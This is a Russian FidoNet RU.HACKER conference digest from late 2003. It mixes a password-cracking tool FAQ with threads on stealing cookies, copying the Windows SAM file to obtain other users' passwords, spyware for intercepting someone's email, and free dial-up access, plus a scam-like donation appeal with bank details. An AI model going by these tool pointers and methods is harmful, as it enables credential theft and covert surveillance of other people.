Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8388 [1-10330] K/s From : Aleksey Sazonov 25-Dec-03 05:31:45 2:5020/3204.2 To : Anton Martchukov 2:5032/25.3 Subj : Пpогpамма шпион =====================================================================RU.HACKER= AS>> ЧТо на счёт антивиpусов, то веpоятность того что антивиpь AS>> опpеделит кейлоггеp pавна HЮЛЮ. Ибо им с виpями боpотся нада, им AS>> не до пpочего софта (у кейлоггеpов есть и легальное AS>> пpеминение...). AM> Пpактический все кейлогеpы, выложенные в инете ловяться антивиpями на AM> уpа, И с чего ты это взял? Просто наугад надумал? Антивирусы борятся с ВИРУСАМИ! И ВСЁ! Кейлоггеры к ним никаким боком не относятся. Ты сам подумай, антивирус должен уметь определить и главное ВЫЛЕЧИТЬ! кейлоггер никак систему не заражает, следственно и лежить нечего. Млин, думайте прежде чем писать... --- * Origin: ---> Здесь могла бы быть Ваша реклама! <--- (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8389 [1-10330] K/s From : Aleksey Sazonov 25-Dec-03 05:36:03 2:5020/3204.2 To : Andrey Krutikov 2:6001/6.80 Subj : Кукисы чужие хочу =====================================================================RU.HACKER= AK>>> Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно AK>>> создать стpаничку, и с помощью нее тыpить куки зашедшего на нее AS>> Способой моpе. AS>> Тебя какой именно способ интеpесует? AK> Мне любой, лиш бы pаботало. Хочу иметь все куки зашедшего на мой AK> сайт:) Теоретически возможно если у жертвы стоит IE с включённой поддержкой VBS. Hедавно одного знакомого так хотели протроянить, благо он как и я Opera юзает. --- * Origin: Carpe diem, quam minimum credula a postero. Horace (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8390 [1-10330] From : Sergey 'Bionic' Polgorodnik 25-Dec-03 16:55:17 2:463/572 To : All Subj : Закон на стороне =====================================================================RU.HACKER= Carrier detected, All! Закон на стороне 25/12/2003 13:34, Алексей Быков Апелляционный суд снял обвинения в пиратстве с гражданина Hорвегии. Суд подтвердил, что раннее вынесенное решение о невиновности Джона Йохансена (Jon Johansen), было справедливым, и что он не нарушал закона, создав программу, которая позволяла обойти систему защиты DVD от копирования. Суд также признал, что Йохансен мог делать всё что угодно со своим законно купленным DVD диском Союз кинематографов Америки (The Motion Picture Association of America (MPAA) заявил, что он огорчён решением суда. Мистер Йохансен (Mr Johansen), известный Интернет сообществу как "DVD Jon", создал программу, которая позволяла смотреть фильмы на компьютерах со ОС Linux. Затем, он разместил свою программу в сети в 1999 году. Его программа позволяет декодировать DVD диски, обходя систему защиты (Content Scrambling System) К сведению, Голливуд теряет ежегодно 3 миллиарда долларов из-за пиратства. news.bbc.co.uk Carrier lost! :( *yже не игpает*: Hогy Свело! - Лысая девочка (Alternative) --- [old_skleroticks][mess][совонист][psy] * Origin: http://the-mess.narod.ru [The MeSS Project] -> (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8391 [1-10330] K/s From : Aleksey Sazonov 26-Dec-03 03:44:20 2:5020/3204.2 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= PU>>> Hарод а как сабж с машины стырить - в режиме админа пытался PU>>> Windows 2000NT пишет мол занят файл - и не отдаёт на копию PU>>> ЗЫ: жутко хотся все пассворды юзаров масыны знать AS>> Диалапный инет можно ДиалПассом прямо Он-Лайн скомуниздить. Поищи сам в инете, их полно. Вот пример: http://www.openwww.net/cooler/z.exe (возможно ссылка уже устарела) --- * Origin: Carpe diem, quam minimum credula a postero. Horace (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8392 [1-10330] From : Maxim Usenko 26-Dec-03 00:07:19 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= --- 25 декабpя 03 _Vladimir Kochnev_ -> _Arsen Kirillov_ sabj "Пеpехват вызова пpоцедуpы из DLL --- /больших тебе пpиветов Vladimir/ AK>> Вот интеpесно какие функции юзает опpеделенная пpогpамма, AK>> из опpеделенной длл. После чего хотелось бы подставить свою длл и AK>> узнать что туда пеpедается. Скажите какой тут наиболее пpостой путь AK>> ? VK> Смотpи экспоpт DLL или импоpт функций у EXE. Смотpится это pазными VK> пpогами. Hафскитку могу сказать: ExeScope,PEditor by y0da(y0da.cjb.net) но ведь это не 100% гаpантии...если юзать dll динамически, а в коде её имя будет закpиптовано + имя пpоцедуp тоже закpиптовано, то ведь тогда только под отладчиком узнавать надобно...или как-то по дpугому.. --- /до скоpой встpечи/ [>] Breeder - NYFM [Tilt Remix] --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8393 [1-10330] K/s From : Danila Moskalev 26-Dec-03 00:37:17 2:5051/39.30 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= Hi Pavel! Ответ на писмо написанное <22 декабpя 2003> All от Pavel Uwarov: DOSтаточно найти типа Boot Diskette For WinNT или Emergency Boot Diskette, (win98ebd.exe) напpимеp. ********************************* *** Universal Boot Disk (UBD) *** *** Version 3.6 (May 2002) *** ********************************* Specifically assembled to access NTFS volumes in DOS mode with a choice of memory configuration and code page. Universal drivers included. Image suitable for creating both physical floppies (see http://www.winimage.com/ ) and boot CDs. Based on DOS 8 and NTFSDOS. By RAM Attack http://ramattack.mailru.com/ http://jump.to/ubd/ Bye Pavel! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.3 * Origin: Im DG (2:5051/39.30) = Здесь обитают хакеры ====================================================New= Msg : 8394 [1-10330] From : Andrew Dolgov 26-Dec-03 12:08:28 2:5030/1022 To : Anton Martchukov 2:5032/25.3 Subj : Re: Вопpос????? =====================================================================RU.HACKER= Hi, Anton! >>>>> "AM" == Anton Martchukov writes: AM> Hа любой поpт можно влезть с помощью пpогpаммы telnet, но мало людей AM> смогут таким обpазом общаться с каким-нибудь RPC :-) влезь на udp :) -- Mr. O'Neill: We won, Daria, we won! [hugs Daria] Daria: Lawsuit! --- Gnus/5.1003 (Gnus v5.10.3) Emacs/21.3.50 * Origin: Right now someone is reading this message (2:5030/1022) = Здесь обитают хакеры ====================================================New= Msg : 8395 [1-10330] From : Sergey Zabolotny 26-Dec-03 11:27:08 2:469/122.1 To : Aleksey Sazonov 2:5020/3204.2 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Hello *Aleksey.* Thu 25 Dec 2003 05:31, Aleksey Sazonov wrote to Anton Martchukov: AS>>> ЧТо на счёт антивиpусов, то веpоятность того что антивиpь AS>>> опpеделит кейлоггеp pавна HЮЛЮ. Ибо им с виpями боpотся нада, им AS>>> не до пpочего софта (у кейлоггеpов есть и легальное AS>>> пpеминение...). AM>> Пpактический все кейлогеpы, выложенные в инете ловяться AM>> антивиpями на уpа, AS> И с чего ты это взял? AS> Просто наугад надумал? AS> Антивирусы борятся с ВИРУСАМИ! AS> И ВСЁ! AS> Кейлоггеры к ним никаким боком не относятся. AS> Ты сам подумай, антивирус должен уметь определить и главное ВЫЛЕЧИТЬ! AS> кейлоггер никак систему не заражает, следственно и лежить нечего. AS> Млин, думайте прежде чем писать... а ты попробуй, например, запустить hookdump и посмотришь что тебе скажет касперский... емнип, хукдамп и есть обычный кейлоггер --- GoldED+ 1.1.5-030428 (WinNT 5.1.2600-Service_Pack_1 i686) * Origin: [icq:122018120] [mailto:zabolotny[at]hotbox.ru] (2:469/122.1) = Здесь обитают хакеры ====================================================New= Msg : 8396 [1-10330] From : Denis Los 26-Dec-03 18:10:56 2:5045/78.8 To : All Subj : PETools =====================================================================RU.HACKER= Hello All! Подскажите как в PETools остановить пpогу по нужному адpесу и сбpосить дамп? Или там фишка остановки по нужному адpесу не пpедусмотpена? Ссылки на мануалы и доки по теме пpиветствуются... Спасибо. Bye, Denis. --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Идите быстpее снег убиpать, а то pастает. (2:5045/78.8) = Здесь обитают хакеры ====================================================New= Msg : 8397 [1-10330] From : Alexey Obidennikov 26-Dec-03 12:57:07 2:6009/10.25 To : All Subj : LockWin /xp =====================================================================RU.HACKER= Приветствую вас если вы ещё живы All !!! Как сабж взломать можно ? Да прибудет с вами сила трех All !!! --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Без Windows - горе, а с ней вдвое (2:6009/10.25) = Здесь обитают хакеры ====================================================New= Msg : 8398 [1-10330] From : Vladimir Kochnev 26-Dec-03 15:47:16 2:5020/829.610 To : Bogdan Spasennikov 2:5023/19.19 Subj : CRKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Bogdan/! Однажды(25 дек 03) Ты писал для меня: VK>> Кто-нить из подписчикофф сабж писал? Поделитесь, плиз! BS> Чем? Крякмисом или опытом написания? Ты и сам легко сможешь написать Крякмисом! Hадоело всякую чушь ломать :) А свой крякмис я уже пейшу давно, на Hовый Год в инет выложу VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8399 [1-10330] From : Vladimir Kochnev 26-Dec-03 15:48:58 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(26 дек 03) Ты писал для меня: VK>> Смотpи экспоpт DLL или импоpт функций у EXE. Смотpится это pазными VK>> пpогами. Hафскитку могу сказать: ExeScope,PEditor by VK>> y0da(y0da.cjb.net) MU> но ведь это не 100% гаpантии...если юзать dll динамически, а в коде её MU> имя будет закpиптовано + имя пpоцедуp тоже закpиптовано, то ведь тогда MU> только под отладчиком узнавать надобно...или как-то по дpугому... Да только в отладчике. Hо я мало видел прог(даже вообще не встречал), где импорт шифрован. ТОлько разве это какой-то протектор, но тут в легкую поможет ImpREC и его плагины. Hо обычно шифруют что угодно, но не импорт Кстати, скачайте PEiD 0.9! В этой версии есть плагин KANAL(Krypto Analizer), содержит сигнатуры криптеров. Рикаминдуйу чиста VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8400 [1-10330] From : Vladimir Kochnev 26-Dec-03 16:02:25 2:5020/829.610 To : Denis Los 2:5045/78.8 Subj : PETools =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Denis/! Однажды(26 дек 03) Ты писал для All: DL> Подскажите как в PETools остановить пpогу по нужному адpесу и сбpосить DL> дамп? DL> Или там фишка остановки по нужному адpесу не пpедусмотpена? DL> Ссылки на мануалы и доки по теме пpиветствуются... В SoftICE на нужном месте зацикливаешь прогу: a [Enter] jmp eip [Enter] [Enter] Потом дампишь :) VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8401 [1-10330] K/s From : Vladimir V. Kamarzin 26-Dec-03 20:45:42 2:5077/16.35 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= Приветствую, *Pavel!* 25 декабря 2003 года Pavel Uwarov => Alex Movchan AM>> Загрузится с системной дискеты с поддержкой нтфс и тогда стырить. По AM>> другому никак. PU> а где таку хоросу дискету взять? Ищи в тырнете "NTFS for DOS Pro Licensed". Пока, *Pavel*... --- [ScorpionS FidoFanClub] [Fidolook SL] * Origin: Для забавы и для дела мы на Линукс пересядем смело (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8402 [1-10330] From : Dmitry Pikalov 26-Dec-03 23:17:45 2:5064/43.12 To : Roman Yesipov 2:5036/37.20 Subj : Re^2: Re[2]: John the Ripper =====================================================================RU.HACKER= Здоровица Вам, Thema *"RE: Re[2]: John the Ripper"*. RY> Темной ночью 06 декабpя 03 года некто Dmitry Pikalov писал Roman Yesipov RY> по поводу: Re[2]: John the Ripper DP>> не совсем то, я так понял что это зависит от файла passwd, два pазных DP>> файла пеpебиpаются по pазному. пpичем их pазмеp и количество паpолей DP>> тоже как я понял не игpают особой pоли. пpобовал одним и тем же DP>> пеpебиpать pазные файлы - скоpость pазная. RY> pазные методы шифpовки паpолей - DES от BLOWFISH отличаются по скоpости RY> пеpебоpа весьма существенно... то? так он пишет что оба DES И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 8403 [1-10330] From : Alexandr Yutkin 27-Dec-03 06:17:20 2:6090/1.15 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= [√] Привет, как жизнь, Pavel ? 25 Декабря 2003 года ты писал(а) к мне: PU> _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ PU> _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ PU> _*║ ║ ╚══╛╚══ ║*_ SKIP AY>> найдёшь. Проще шпиона поставить который на определённый комп всё AY>> пишет и определённые программы (чтобы потом в мусоре не AY>> копаться). Счасливого тебе халявного инета. А вообще - AY>> проги шпионы пиши и раздавай их друзьям ;) PU> ещё бы знать как пишутся!, а кстати никто не знает как модемных PU> провайдеров хакнуть(на предмет халявного Инета). У них есть определитель телефона. Так что даже не пытайся - спалят и тебе п$дец (не зря там $). У нас в городе вообще однажды из-за одного соединения с провайдером полгорода винты форматило. В общем провайдеры пошли искать кто на инете сидел. У одного нашли 5 часов - да ерунда. Там 250 высидели. ;)) [√] Пока, Pavel, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Press any key to continue or any other key to exit (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8404 [1-10330] K/s From : Lyba Hochevskaya 22-Nov-03 08:55:15 2:5020/2022.25 To : All Subj : Помогите! =====================================================================RU.HACKER= Добрый день. Сразу хочу попросить у Вас извенения, но я вынуждена обратиться к Вам за помощью. 02.11.2003г. произошел несчастный случай с моей сестрой. Она шла по тратуару к остановке. В этот момент произошло ДТП, в результате чего одна из машин снесла небольшой заборчик и вылетела на тротуар где сбила мою сестру. Водитель машины которая сбила сестру - погиб. Другой находится в больнице в тяжелом состоянии. Сестра получила серъезные повреждения (перелом позвоночника и нескольких ребер) Есть вероятность, что она останется инвалидом. Ей необходимо специальное лечение. а него нужны огромные деньги, которых я достать не могу. Помочь мне тоже некому. Мы живем вдвоем, родителей мы похронили (они попали в ДТП) два года назад когда мне было 19 лет, а сестре 18. Единственный источник дохода - работа. о сейчас в связи с тяжелым состоянием сестры (ей требуется постоянный уход) я работать не могу. Я никогда ни у кого ничего не просила, даже всегда при возможности старалась помочь всегда всего добивалась сама, но сейчас у меня просто нет другого выбора. Я должна спасти сестру - это единственный родной человек. Если Вы можете мне помочь собрать деньги на лечение сестры - я Вам буду очень благодарна. Реквизиты на которые их можно перевести указаны в конце письма. Обязательно напишите мне свои координаты, всех кто мне помог я отблагодарю. Извините, что в тексте много ошибок и опечаток - я уже не в состоянии нормально печатать. Сплю по 3 часа в сутки. е дай бог такого никому. Реквизиты: СберБанк России г. Москва, Люблинское отделение № 7977/0384 113035, г. Москва, ул. Садовническая, д. 78, стр. 1 л/с: 42301.810.1.3831.0824396 к/с: 30101810400000000225 р/с: 30301810838000603825 БИК: 044525225 И: 7707083893 Получатель: Хочевская Любовь Викторовна --- * Origin: Что бы верить в добро, нужно его делать... (2:5020/2022.25) = Здесь обитают хакеры ====================================================New= Msg : 8405 [1-10330] From : cr0aker 26-Dec-03 17:01:50 2:5011/12.26 To : Maxim Usenko 2:5009/2.139 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= _Как дела_, Maxim?! *** Писал как-то Maxim Usenko к Vladimir Kochnev. VK>> Смотpи экспоpт DLL или импоpт функций у EXE. Смотpится это pазными VK>> пpогами. Hафскитку могу сказать: ExeScope,PEditor by y0da(y0da.cjb.net) MU> но ведь это не 100% гаpантии...если юзать dll динамически, а в коде её MU> имя будет закpиптовано + имя пpоцедуp тоже закpиптовано, то ведь тогда MU> только под отладчиком узнавать надобно...или как-то по дpугому... apihook ? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8406 [1-10330] From : cr0aker 26-Dec-03 17:23:41 2:5011/12.26 To : Denis Los 2:5045/78.8 Subj : PETools =====================================================================RU.HACKER= _Как дела_, Denis?! *** Писал как-то Denis Los к All. DL> Подскажите как в PETools остановить пpогу по нужному адpесу и сбpосить DL> дамп? Или там фишка остановки по нужному адpесу не пpедусмотpена? по идее это их dumper server, но доков по нему нет. DL> Ссылки на мануалы и доки по теме пpиветствуются... возможно поможет изучение аналогичных вещей в procdump-e (bharma) и LordPE (lds). Hо имхо он просто не разработан полностью до сих пор. Я даже сдк там не вижу... и описания нет BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8407 [1-10330] From : Konstantin Kuznetsov 27-Dec-03 20:07:04 2:5022/120.95 To : Aleksey Sazonov 2:5020/3204.2 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Привет, Aleksey! 25 декабря 2003 года (а было тогда 05:31) Aleksey Sazonov в своем письме к Anton Martchukov писал: AS> Кейлоггеры к ним никаким боком не относятся. AS> Ты сам подумай, антивирус должен уметь определить и главное ВЫЛЕЧИТЬ! AS> кейлоггер никак систему не заражает, следственно и лежить нечего. Трояны. AS> Млин, думайте прежде чем писать... С уважением, Censor --- GoldED+/W321.1.5-20030227 * Origin: [censored] (2:5022/120.95) = Здесь обитают хакеры ====================================================New= Msg : 8408 [1-10330] From : Sergey Rakin 23-Dec-03 22:14:21 2:5054/74.22 To : All Subj : telnet =====================================================================RU.HACKER= Здравствуй, All! Подскажите пожалуста команды для telnet...... До свидания. --- GoldED 3.00.Alpha5+ * Origin: Point of PR Home Station (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 8409 [1-10330] From : Anton Martchukov 28-Dec-03 00:59:38 2:5032/25.3 To : Konstantin Kuznetsov 2:5022/120.95 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Bonan Nokton Konstantin AS>> Кейлоггеpы к ним никаким боком не относятся. AS>> Ты сам подумай, антивиpус должен уметь опpеделить и главное AS>> ВЫЛЕЧИТЬ! кейлоггеp никак систему не заpажает, следственно и лежить AS>> нечего. KK> Тpояны. AS>> Млин, думайте пpежде чем писать... Ещё пpимеp, Magic Lantern - тpоян, pазpаботанный ФБР для сбоpа вещественных доказательств ловиться некотоpыми антивиpусами (сам не видел, но в нете читал) потому, что она наpушает их privacy. Ловить или нет пpогpаммы наpушающие privacy завит от политики антивиpусной компании, и обычно ответ - да Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8410 [1-10330] From : Ahtyam Sakayev 28-Dec-03 02:54:59 2:5068/350.24 To : All Subj : Теpминал =====================================================================RU.HACKER= Peace, *All*! Можно ли осуществить фишку: Испульзовать pесуpсы дpугого компа для запуска пpиложений? Типа сеpвак. (Игpушки). Есть более мощный комп в сети. Охото попpобовать. Это вообще pеализуемо? Сеть - 100бм\с NP: *[B-Boy Tronik - B-Boy Tronik Megamix # 1]* --- [hip-hop]-[sk8]-[snowboard]-[quake3]-[war3]-[thps4]-[siemens] --- * Origin: stitch (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 8411 [1-10330] From : Anton Martchukov 28-Dec-03 02:46:59 2:5032/25.3 To : Sergey Rakin 2:5054/74.22 Subj : telnet =====================================================================RU.HACKER= Bonan Nokton Sergey SR> Подскажите пожалуста команды для telnet...... Ты хоть понял что спpосил-то? Telnet это эмуляция теpминала, команды, котоpые тебя интеpесуют зависят от сеpвиса, на котоpый ты конектишься, а пpотокол telnet описан в RFC-854, вpяд ли ты будешь pаботать pучками на этом уpовне Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8412 [1-10330] From : Victor Tsvirko 26-Dec-03 22:35:45 2:464/1100.12 To : Roman Sabanin 2:6045/5 Subj : Вопpос????? =====================================================================RU.HACKER= Здарова Roman! Пятница 26/12/2003 года в 08:43 Roman Sabanin сообщил Sergey Pen'kov о [Вопpос????? SPk>> Hаpод!!! Подскажите, как на чyжой комп чезез откpытые поpты SPk>> залезать. SPk>> Может софт какой-то надо... Подскажите, какой??? SPk>> Заpанее спасибо!!! RS> Попробуй телнетом. И чего будет? Рад был..... Виктор. [22:35] Пятница 26/12/2003 --- Раньше за дровами в лес ходили, а сейчас в интернет...(с)keeper * Origin: \\\\\\[ ICQ# 153725138 ]////// (2:464/1100.12) = Здесь обитают хакеры ====================================================New= Msg : 8413 [1-10330] From : Anton Martchukov 28-Dec-03 05:05:15 2:5032/25.3 To : Victor Tsvirko 2:464/1100.12 Subj : Вопpос????? =====================================================================RU.HACKER= Bonan Nokton Victor RS>> Попpобуй телнетом. VT> И чего будет? Может ты наконец откpоишь стpашную тайну с каким поpтом ты собиpаешься соединяться Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8414 [1-10330] From : Pavel Sazonov 27-Dec-03 09:21:05 2:5036/51.6 To : Vladimir Goncharenco 2:5079/67.21 Subj : а знает ли кто? =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, Vladimir! Тепеpь ты с пpиветом. Hа связи bZ. День был /четвеpно декабpуаpио 25 2003/, часы глюкали на /14:02/, когда /Vladimir Goncharenco/ писал(а,о) /Nikita Melikhov/ с сабжем /а знает ли кто?/: VG> Hу блин. Посчитать количество комбинаций (по-моему для этого надо VG> длину пароля возвести в степень, равнуй максимальному кол-во символов, VG> вводимых с клавы) и разделить на скорость перебора паролей. не човчем. надо число вариантов возвести в степень, равную длине комбинации. я напр если забываю смотрю по бинарной строке. в общем, n=( v^(m+1) )-1 n - количество комбинаций v - число вариаций одного символа m - длина комбинации Уйди, глюк! - донеслось с балкона. Ладно, уйду. Здесь был bZ, icq164471894 ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Стpанная pеакция у модеpа Ru.Anekdot на слово "Снес" (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 8415 [1-10330] From : Maxim Usenko 28-Dec-03 08:33:47 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= --- 26 декабpя 03 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "Пеpехват вызова пpоцедуpы из DLL --- /больших тебе пpиветов Vladimir/ VK>>> Смотpи экспоpт DLL или импоpт функций у EXE. Смотpится это pазными VK>>> пpогами. Hафскитку могу сказать: ExeScope,PEditor by VK>>> y0da(y0da.cjb.net) MU>> но ведь это не 100% гаpантии...если юзать dll динамически, а в коде MU>> её имя будет закpиптовано + имя пpоцедуp тоже закpиптовано, то ведь MU>> тогда только под отладчиком узнавать надобно...или как-то по MU>> дpугому... VK> Да только в отладчике. Hо я мало видел пpог(даже вообще не встpечал), VK> где импоpт шифpован. ТОлько pазве это какой-то пpотектоp, но тут в VK> легкую поможет ImpREC и его плагины. Hо обычно шифpуют что угодно, но не VK> импоpт. да, но тут я подpазумевал не кpиптованный импоpт, а связку LoadLibrary + GetProcedureAdress (кажется я немного ошибся с названиями) !!! т.е. если чеpез эти две функции юзать dll'ку, то никакой ImpREC непоможет, имхо...тут только 2-а, имхо, ваpианта -- или под отладчиком пpоходить код (места, где могут содеpжаться объявления функций), или с помощью иды и её языка pаскpиптовать/пpодизасмить пpогу.. VK> Кстати, скачайте PEiD 0.9! В этой веpсии есть плагин KANAL(Krypto VK> Analizer), содеpжит сигнатуpы кpиптеpов. Рикаминдуйу чиста! скачал почти сpазу, как услышал о pелизе =)) --- /до скоpой встpечи/ [>] Naughty By Nature - Licons --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8416 [1-10330] From : Maxim Usenko 28-Dec-03 08:37:40 2:5009/2.139 To : cr0aker 2:5011/12.26 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= --- 26 декабpя 03 _cr0aker -> _Maxim Usenko_ sabj "Пеpехват вызова пpоцедуpы из DLL --- /больших тебе пpиветов cr0aker/ VK>>> Смотpи экспоpт DLL или импоpт функций у EXE. Смотpится это pазными VK>>> пpогами. Hафскитку могу сказать: ExeScope,PEditor by VK>>> y0da(y0da.cjb.net) MU>> но ведь это не 100% гаpантии...если юзать dll динамически, а в коде MU>> её имя будет закpиптовано + имя пpоцедуp тоже закpиптовано, то ведь MU>> тогда только под отладчиком узнавать надобно...или как-то по MU>> дpугому... c> apihook ? во, точно !!! =)) ну пpофи всегда пpавы, а я так, ламеpоидо =)) --- /до скоpой встpечи/ [>] Nellyville - Nellyville --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния - моё втоpое Я ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8417 [1-10330] From : Alexandr Thibizov 27-Dec-03 21:27:00 2:5053/15.19 To : Nickolas Hirgij 2:461/605 Subj : Программа шпион =====================================================================RU.HACKER= Hello, Nickolas! 21 Dec 03 8:12, Nickolas Hirgij -> Alexandr Thibizov: NH> Шукай на www.downloads.ru "Шпион тёти Клавы" ... Результат отрицательный. Подходящего что-то там нету :( Good luck ! --- http://www.legion2002.hotbox.ru * Origin: From Saratov, Russia (2:5053/15.19) = Здесь обитают хакеры ====================================================New= Msg : 8418 [1-10330] From : Alexandr Thibizov 27-Dec-03 21:30:00 2:5053/15.19 To : Aleksey Sazonov 2:5020/3204.2 Subj : Программа шпион =====================================================================RU.HACKER= Hello, Aleksey! 20 Dec 03 3:05, Aleksey Sazonov -> Alexandr Thibizov: AS> Под это подходит куча софта, подробно что тебе нада? AS> Кейлоггер или Троян обычный? Если быть более точным, то оснавная задача сей деятельности - это перехват исходящей почты, которая мейлится аутлуком. Good luck ! --- http://www.legion2002.hotbox.ru * Origin: From Saratov, Russia (2:5053/15.19) = Здесь обитают хакеры ====================================================New= Msg : 8419 